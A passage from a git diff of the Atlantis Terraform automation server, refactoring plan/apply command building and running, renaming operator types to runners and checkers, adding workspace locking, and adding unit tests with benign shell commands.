p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { - return CommandResponse{Error: err} + return projCtx, err } hasAtlantisYAML := !os.IsNotExist(err) if hasAtlantisYAML { // If they've specified a project by name we look it up. Otherwise we // use the dir and workspace. - if ctx.Command.ProjectName != "" { - projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if cmd.ProjectName != "" { + projCfg = config.FindProjectByName(cmd.ProjectName) if projCfg == nil { - return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName) } } else { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + projCfg = config.FindProject(cmd.Dir, cmd.Workspace) } globalCfg = &config } - if ctx.Command.ProjectName != "" && !hasAtlantisYAML { - return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + if cmd.ProjectName != "" && !hasAtlantisYAML { + return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename) } - projCtx := models.ProjectCommandContext{ + projCtx = models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, Pull: ctx.Pull, User: ctx.User, Log: ctx.Log, - CommentArgs: ctx.Command.Flags, - Workspace: ctx.Command.Workspace, - RepoRelPath: ctx.Command.Dir, - ProjectName: ctx.Command.ProjectName, + CommentArgs: cmd.Flags, + Workspace: cmd.Workspace, + RepoRelPath: cmd.Dir, + ProjectName: cmd.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } - projAbsPath := filepath.Join(repoDir, ctx.Command.Dir) - res := p.ProjectOperator.Plan(projCtx, &projAbsPath) - res.Workspace = projCtx.Workspace - res.Path = projCtx.RepoRelPath - return CommandResponse{ - ProjectResults: []ProjectResult{ - res, - }, - } + return projCtx, nil } -func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { - repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) +func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) { + var projCtx models.ProjectCommandContext + + repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, cmd.Workspace) if err != nil { - return CommandResponse{Failure: "No workspace found. Did you run plan?"} + return projCtx, err } // todo: can deduplicate this between PlanViaComment @@ -202,53 +199,46 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman // Parse config file if it exists. config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { - return CommandResponse{Error: err} + return projCtx, err } hasAtlantisYAML := !os.IsNotExist(err) if hasAtlantisYAML { // If they've specified a project by name we look it up. Otherwise we // use the dir and workspace. - if ctx.Command.ProjectName != "" { - projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if cmd.ProjectName != "" { + projCfg = config.FindProjectByName(cmd.ProjectName) if projCfg == nil { - return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName) } } else { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + projCfg = config.FindProject(cmd.Dir, cmd.Workspace) } globalCfg = &config } - if ctx.Command.ProjectName != "" && !hasAtlantisYAML { - return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + if cmd.ProjectName != "" && !hasAtlantisYAML { + return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename) } - projCtx := models.ProjectCommandContext{ + projCtx = models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, Pull: ctx.Pull, User: ctx.User, Log: ctx.Log, - CommentArgs: ctx.Command.Flags, - Workspace: ctx.Command.Workspace, - RepoRelPath: ctx.Command.Dir, - ProjectName: ctx.Command.ProjectName, + CommentArgs: cmd.Flags, + Workspace: cmd.Workspace, + RepoRelPath: cmd.Dir, + ProjectName: cmd.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } - res := p.ProjectOperator.Apply(projCtx, filepath.Join(repoDir, ctx.Command.Dir)) - res.Workspace = projCtx.Workspace - res.Path = projCtx.RepoRelPath - return CommandResponse{ - ProjectResults: []ProjectResult{ - res, - }, - } + return projCtx, nil } // matchingProjects returns the list of projects whose WhenModified fields match // any of the modifiedFiles. -func (p *DefaultPullRequestOperator) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) { +func (p *DefaultProjectCommandBuilder) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) { var projects []valid.Project for _, project := range config.Projects { log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace) diff --git a/server/events/pull_request_operator_test.go b/server/events/project_command_builder_test.go similarity index 100% rename from server/events/pull_request_operator_test.go rename to server/events/project_command_builder_test.go diff --git a/server/events/project_operator.go b/server/events/project_command_runner.go similarity index 57% rename from server/events/project_operator.go rename to server/events/project_command_runner.go index b5e8184ec3..0db221defe 100644 --- a/server/events/project_operator.go +++ b/server/events/project_command_runner.go @@ -14,6 +14,7 @@ package events import ( + "os" "path/filepath" "strings" @@ -41,46 +42,48 @@ type PlanSuccess struct { LockURL string } -type ProjectOperator struct { - Locker ProjectLocker - LockURLGenerator LockURLGenerator - InitStepOperator runtime.InitStepOperator - PlanStepOperator runtime.PlanStepOperator - ApplyStepOperator runtime.ApplyStepOperator - RunStepOperator runtime.RunStepOperator - ApprovalOperator runtime.ApprovalOperator - Workspace AtlantisWorkspace - Webhooks WebhooksSender +type ProjectCommandRunner struct { + Locker ProjectLocker + LockURLGenerator LockURLGenerator + InitStepRunner runtime.InitStepRunner + PlanStepRunner runtime.PlanStepRunner + ApplyStepRunner runtime.ApplyStepRunner + RunStepRunner runtime.RunStepRunner + PullApprovedChecker runtime.PullApprovedChecker + Workspace AtlantisWorkspace + Webhooks WebhooksSender + AtlantisWorkspaceLocker AtlantisWorkspaceLocker } -func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult { +func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult { // Acquire Atlantis lock for this repo/dir/workspace. lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath)) if err != nil { - return ProjectResult{Error: errors.Wrap(err, "acquiring lock")} + return ProjectCommandResult{ + Error: errors.Wrap(err, "acquiring lock"), + } } if !lockAttempt.LockAcquired { - return ProjectResult{Failure: lockAttempt.LockFailureReason} + return ProjectCommandResult{Failure: lockAttempt.LockFailureReason} } ctx.Log.Debug("acquired lock for project") - // Ensure project has been cloned. - var projAbsPath string - if projAbsPathPtr == nil { - ctx.Log.Debug("project has not yet been cloned") - repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) - if cloneErr != nil { - if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { - ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) - } - return ProjectResult{Error: cloneErr} + // Acquire internal lock for the directory we're going to operate in. + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num) + if err != nil { + return ProjectCommandResult{Error: err} + } + defer unlockFn() + + // Clone is idempotent so okay to run even if the repo was already cloned. + repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) + if cloneErr != nil { + if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) } - projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) - ctx.Log.Debug("project successfully cloned to %q", projAbsPath) - } else { - projAbsPath = *projAbsPathPtr - ctx.Log.Debug("project was already cloned to %q", projAbsPath) + return ProjectCommandResult{Error: cloneErr} } + projAbsPath := filepath.Join(repoDir, ctx.RepoRelPath) // Use default stage unless another workflow is defined in config stage := p.defaultPlanStage() @@ -98,10 +101,10 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) } // todo: include output from other steps. - return ProjectResult{Error: err} + return ProjectCommandResult{Error: err} } - return ProjectResult{ + return ProjectCommandResult{ PlanSuccess: &PlanSuccess{ LockURL: p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey), TerraformOutput: strings.Join(outputs, "\n"), @@ -109,20 +112,20 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr } } -func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) { +func (p *ProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) { var outputs []string for _, step := range steps { var out string var err error switch step.StepName { case "init": - out, err = p.InitStepOperator.Run(ctx, step.ExtraArgs, absPath) + out, err = p.InitStepRunner.Run(ctx, step.ExtraArgs, absPath) case "plan": - out, err = p.PlanStepOperator.Run(ctx, step.ExtraArgs, absPath) + out, err = p.PlanStepRunner.Run(ctx, step.ExtraArgs, absPath) case "apply": - out, err = p.ApplyStepOperator.Run(ctx, step.ExtraArgs, absPath) + out, err = p.ApplyStepRunner.Run(ctx, step.ExtraArgs, absPath) case "run": - out, err = p.RunStepOperator.Run(ctx, step.RunCommand, absPath) + out, err = p.RunStepRunner.Run(ctx, step.RunCommand, absPath) } if err != nil { @@ -136,21 +139,36 @@ func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommand return outputs, nil } -func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string) ProjectResult { +func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult { + repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Workspace) + if err != nil { + if os.IsNotExist(err) { + return ProjectCommandResult{Error: errors.New("project has not been cloned–did you run plan?")} + } + return ProjectCommandResult{Error: err} + } + absPath := filepath.Join(repoDir, ctx.RepoRelPath) + if ctx.ProjectConfig != nil { for _, req := range ctx.ProjectConfig.ApplyRequirements { switch req { case "approved": - approved, err := p.ApprovalOperator.IsApproved(ctx.BaseRepo, ctx.Pull) + approved, err := p.PullApprovedChecker.IsApproved(ctx.BaseRepo, ctx.Pull) if err != nil { - return ProjectResult{Error: errors.Wrap(err, "checking if pull request was approved")} + return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")} } if !approved { - return ProjectResult{Failure: "Pull request must be approved before running apply."} + return ProjectCommandResult{Failure: "Pull request must be approved before running apply."} } } } } + // Acquire internal lock for the directory we're going to operate in. + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num) + if err != nil { + return ProjectCommandResult{Error: err} + } + defer unlockFn() // Use default stage unless another workflow is defined in config stage := p.defaultApplyStage() @@ -170,14 +188,14 @@ func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string }) if err != nil { // todo: include output from other steps. - return ProjectResult{Error: err} + return ProjectCommandResult{Error: err} } - return ProjectResult{ + return ProjectCommandResult{ ApplySuccess: strings.Join(outputs, "\n"), } } -func (p ProjectOperator) defaultPlanStage() valid.Stage { +func (p ProjectCommandRunner) defaultPlanStage() valid.Stage { return valid.Stage{ Steps: []valid.Step{ { @@ -190,7 +208,7 @@ func (p ProjectOperator) defaultPlanStage() valid.Stage { } } -func (p ProjectOperator) defaultApplyStage() valid.Stage { +func (p ProjectCommandRunner) defaultApplyStage() valid.Stage { return valid.Stage{ Steps: []valid.Step{ { diff --git a/server/events/project_operator_test.go b/server/events/project_command_runner_test.go similarity index 100% rename from server/events/project_operator_test.go rename to server/events/project_command_runner_test.go diff --git a/server/events/project_result.go b/server/events/project_result.go index ca5a1ecee4..f01ccd9361 100644 --- a/server/events/project_result.go +++ b/server/events/project_result.go @@ -17,8 +17,12 @@ import "github.com/runatlantis/atlantis/server/events/vcs" // ProjectResult is the result of executing a plan/apply for a project. type ProjectResult struct { - Path string - Workspace string + ProjectCommandResult + Path string + Workspace string +} + +type ProjectCommandResult struct { Error error Failure string PlanSuccess *PlanSuccess diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_runner.go similarity index 83% rename from server/events/runtime/apply_step_operator.go rename to server/events/runtime/apply_step_runner.go index 7b4a58c80a..2cb3a50c1d 100644 --- a/server/events/runtime/apply_step_operator.go +++ b/server/events/runtime/apply_step_runner.go @@ -9,12 +9,12 @@ import ( "github.com/runatlantis/atlantis/server/events/models" ) -// ApplyStepOperator runs `terraform apply`. -type ApplyStepOperator struct { +// ApplyStepRunner runs `terraform apply`. +type ApplyStepRunner struct { TerraformExecutor TerraformExec } -func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { +func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { // todo: move this to a common library planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace) if ctx.ProjectName != "" { diff --git a/server/events/runtime/apply_step_operator_test.go b/server/events/runtime/apply_step_runner_test.go similarity index 95% rename from server/events/runtime/apply_step_operator_test.go rename to server/events/runtime/apply_step_runner_test.go index 1aad3c9e23..afc5c99e30 100644 --- a/server/events/runtime/apply_step_operator_test.go +++ b/server/events/runtime/apply_step_runner_test.go @@ -17,7 +17,7 @@ import ( ) func TestRun_NoDir(t *testing.T) { - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: nil, } _, err := o.Run(models.ProjectCommandContext{ @@ -30,7 +30,7 @@ func TestRun_NoDir(t *testing.T) { func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: nil, } _, err := o.Run(models.ProjectCommandContext{ @@ -49,7 +49,7 @@ func TestRun_Success(t *testing.T) { RegisterMockTestingT(t) terraform := mocks.NewMockClient() - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: terraform, } @@ -74,7 +74,7 @@ func TestRun_UsesConfiguredTFVersion(t *testing.T) { RegisterMockTestingT(t) terraform := mocks.NewMockClient() - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: terraform, } tfVersion, _ := version.NewVersion("0.11.0") diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_runner.go similarity index 87% rename from server/events/runtime/init_step_operator.go rename to server/events/runtime/init_step_runner.go index f483ecbbd9..da8ae585ff 100644 --- a/server/events/runtime/init_step_operator.go +++ b/server/events/runtime/init_step_runner.go @@ -6,13 +6,13 @@ import ( ) // InitStep runs `terraform init`. -type InitStepOperator struct { +type InitStepRunner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version } // nolint: unparam -func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { +func (i *InitStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { tfVersion := i.DefaultTFVersion if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { tfVersion = ctx.ProjectConfig.TerraformVersion diff --git a/server/events/runtime/init_step_operator_test.go b/server/events/runtime/init_step_runner_test.go similarity index 97% rename from server/events/runtime/init_step_operator_test.go rename to server/events/runtime/init_step_runner_test.go index efbf4ca283..4a1416fbae 100644 --- a/server/events/runtime/init_step_operator_test.go +++ b/server/events/runtime/init_step_runner_test.go @@ -44,7 +44,7 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - iso := runtime.InitStepOperator{ + iso := runtime.InitStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } diff --git a/server/events/runtime/plan_step_operater.go b/server/events/runtime/plan_step_runner.go similarity index 93% rename from server/events/runtime/plan_step_operater.go rename to server/events/runtime/plan_step_runner.go index 30028dd487..f0e49b6ed7 100644 --- a/server/events/runtime/plan_step_operater.go +++ b/server/events/runtime/plan_step_runner.go @@ -15,12 +15,12 @@ import ( const atlantisUserTFVar = "atlantis_user" const defaultWorkspace = "default" -type PlanStepOperator struct { +type PlanStepRunner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version } -func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { +func (p *PlanStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { tfVersion := p.DefaultTFVersion if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { tfVersion = ctx.ProjectConfig.TerraformVersion @@ -55,7 +55,7 @@ func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []str // switchWorkspace changes the terraform workspace if necessary and will create // it if it doesn't exist. It handles differences between versions. -func (p *PlanStepOperator) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error { +func (p *PlanStepRunner) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error { // In versions less than 0.9 there is no support for workspaces. noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion) // If the user tried to set a specific workspace in the comment but their diff --git a/server/events/runtime/plan_step_operater_test.go b/server/events/runtime/plan_step_runner_test.go similarity index 87% rename from server/events/runtime/plan_step_operater_test.go rename to server/events/runtime/plan_step_runner_test.go index bf80927b6d..01dce930ba 100644 --- a/server/events/runtime/plan_step_operater_test.go +++ b/server/events/runtime/plan_step_runner_test.go @@ -26,7 +26,7 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ DefaultTFVersion: tfVersion, TerraformExecutor: terraform, } @@ -59,7 +59,7 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -107,7 +107,7 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -162,7 +162,7 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -201,7 +201,7 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -243,7 +243,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -265,3 +265,31 @@ func TestRun_AddsEnvVarFile(t *testing.T) { terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace") Equals(t, "output", output) } + +func TestRun_UsesDiffPathForProject(t *testing.T) { + // Test that if running for a project, uses a different path for the plan + // file. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + tfVersion, _ := version.NewVersion("0.10.0") + logger := logging.NewNoopLogger() + s := runtime.PlanStepRunner{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, + } + When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/projectname-default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} + When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "default")).ThenReturn("output", nil) + + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "default", + RepoRelPath: ".", + ProjectName: "projectname", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") + Ok(t, err) + Equals(t, "output", output) +} diff --git a/server/events/runtime/approval_operator.go b/server/events/runtime/pull_approved_checker.go similarity index 67% rename from server/events/runtime/approval_operator.go rename to server/events/runtime/pull_approved_checker.go index 63731f3427..049f434969 100644 --- a/server/events/runtime/approval_operator.go +++ b/server/events/runtime/pull_approved_checker.go @@ -5,11 +5,11 @@ import ( "github.com/runatlantis/atlantis/server/events/vcs" ) -type ApprovalOperator struct { +type PullApprovedChecker struct { VCSClient vcs.ClientProxy } -func (a *ApprovalOperator) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { +func (a *PullApprovedChecker) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { approved, err := a.VCSClient.PullIsApproved(baseRepo, pull) if err != nil { return false, err diff --git a/server/events/runtime/run_step_operator_test.go b/server/events/runtime/run_step_operator_test.go deleted file mode 100644 index 899327a695..0000000000 --- a/server/events/runtime/run_step_operator_test.go +++ /dev/null @@ -1,3 +0,0 @@ -package runtime_test - -// todo diff --git a/server/events/runtime/run_step_operator.go b/server/events/runtime/run_step_runner.go similarity index 77% rename from server/events/runtime/run_step_operator.go rename to server/events/runtime/run_step_runner.go index 6554527be6..1b406737aa 100644 --- a/server/events/runtime/run_step_operator.go +++ b/server/events/runtime/run_step_runner.go @@ -9,11 +9,11 @@ import ( "github.com/runatlantis/atlantis/server/events/models" ) -// RunStepOperator runs custom commands. -type RunStepOperator struct { +// RunStepRunner runs custom commands. +type RunStepRunner struct { } -func (r *RunStepOperator) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) { +func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) { if len(command) < 1 { return "", errors.New("no commands for run step") } diff --git a/server/events/runtime/run_step_runner_test.go b/server/events/runtime/run_step_runner_test.go new file mode 100644 index 0000000000..36262b235c --- /dev/null +++ b/server/events/runtime/run_step_runner_test.go @@ -0,0 +1,50 @@ +package runtime_test + +import ( + "strings" + "testing" + + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRunStepRunner_Run(t *testing.T) { + cases := []struct { + Command string + ExpOut string + ExpErr string + }{ + { + Command: "echo hi", + ExpOut: "hi\n", + }, + { + Command: "echo hi >> file && cat file", + ExpOut: "hi\n", + }, + { + Command: "lkjlkj", + ExpErr: "exit status 127: running \"lkjlkj\" in", + }, + } + + r := runtime.RunStepRunner{} + ctx := models.ProjectCommandContext{ + Log: logging.NewNoopLogger(), + } + for _, c := range cases { + t.Run(c.Command, func(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + out, err := r.Run(ctx, strings.Split(c.Command, " "), tmpDir) + if c.ExpErr != "" { + ErrContains(t, c.ExpErr, err) + return + } + Ok(t, err) + Equals(t, c.ExpOut, out) + }) + } +} diff --git a/server/events/vcs/fixtures/fixtures.go b/server/events/vcs/fixtures/fixtures.go index e3155f1992..6939162032 100644 --- a/server/events/vcs/fixtures/fixtures.go +++ b/server/events/vcs/fixtures/fixtures.go @@ -15,6 +15,14 @@ package fixtures import "github.com/google/go-github/github" +var PullEvent = github.PullRequestEvent{ + Sender: &github.User{ + Login: github.String("user"), + }, + Repo: &Repo, + PullRequest: &Pull, +} + var Pull = github.PullRequest{ Head: &github.PullRequestBranch{ SHA: github.String("sha256"), diff --git a/server/events/vcs/vcs_test.go b/server/events/vcs/vcs_test.go new file mode 100644 index 0000000000..5333ff26fe --- /dev/null +++ b/server/events/vcs/vcs_test.go @@ -0,0 +1,19 @@ +package vcs_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/vcs" + . "github.com/runatlantis/atlantis/testing" +) + +func TestStatus_String(t *testing.T) { + cases := map[vcs.CommitStatus]string{ + vcs.Pending: "pending", + vcs.Success: "success", + vcs.Failed: "failed", + } + for k, v := range cases { + Equals(t, v, k.String()) + } +} diff --git a/server/events_controller.go b/server/events_controller.go index 3db62bd96e..f666e1e329 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -29,7 +29,7 @@ const githubHeader = "X-Github-Event" const gitlabHeader = "X-Gitlab-Event" // EventsController handles all webhook requests which signify 'events' in the -// VCS host, ex. GitHub. It's split out from Server to make testing easier. +// VCS host, ex. GitHub. type EventsController struct { CommandRunner events.CommandRunner PullCleaner events.PullCleaner @@ -51,11 +51,7 @@ type EventsController struct { // startup to support. SupportedVCSHosts []models.VCSHostType VCSClient vcs.ClientProxy - // AtlantisGithubUser is the user that atlantis is running as for Github. - AtlantisGithubUser models.User - // AtlantisGitlabUser is the user that atlantis is running as for Gitlab. - AtlantisGitlabUser models.User - TestingMode bool + TestingMode bool } // Post handles POST webhook requests. @@ -117,27 +113,20 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event return } - // We pass in an empty models.Repo for headRepo because we need to do additional - // calls to get that information but we need this code path to be generic. - // Later on in CommandHandler we detect that this is a GitHub event and - // make the necessary calls to get the headRepo. - e.handleCommentEvent(w, baseRepo, models.Repo{}, user, pullNum, event.Comment.GetBody(), models.Github) + // We pass in nil for maybeHeadRepo because the head repo data isn't + // available in the GithubIssueComment event. + e.handleCommentEvent(w, baseRepo, nil, user, pullNum, event.Comment.GetBody(), models.Github) } // HandleGithubPullRequestEvent will delete any locks associated with the pull // request if the event is a pull request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) { - pull, headRepo, err := e.Parser.ParseGithubPull(pullEvent.PullRequest) + pull, baseRepo, headRepo, user, err := e.Parser.ParseGithubPullEvent(pullEvent) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID) return } - baseRepo, err := e.Parser.ParseGithubRepo(pullEvent.Repo) - if err != nil { - e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID) - return - } var eventType string switch pullEvent.GetAction() { case "opened": @@ -150,7 +139,7 @@ func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, p eventType = OtherPullEvent } e.Logger.Info("identified event as type %q", eventType) - e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType) + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType) } const OpenPullEvent = "opened" @@ -179,16 +168,13 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // We use a goroutine so that this function returns and the connection is // closed. fmt.Fprintln(w, "Processing...") - // We use a Command to represent autoplanning but we set dir and - // workspace to '*' to indicate that all applicable dirs and workspaces - // should be planned. - autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", "", true) - e.Logger.Info("executing command %s", autoplanCmd) + + e.Logger.Info("executing autoplan") if !e.TestingMode { - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + go e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user) } else { // When testing we want to wait for everything to complete. - e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user) } return case ClosedPullEvent: @@ -202,7 +188,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep return case OtherPullEvent: // Else we ignore the event. - e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event") + e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-actionable pull request event") return } } @@ -236,10 +222,10 @@ func (e *EventsController) HandleGitlabCommentEvent(w http.ResponseWriter, event e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err) return } - e.handleCommentEvent(w, baseRepo, headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab) + e.handleCommentEvent(w, baseRepo, &headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab) } -func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) { +func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) { parseResult := e.CommentParser.Parse(comment, vcsHost) if parseResult.Ignore { truncated := comment @@ -278,10 +264,10 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // Respond with success and then actually execute the command 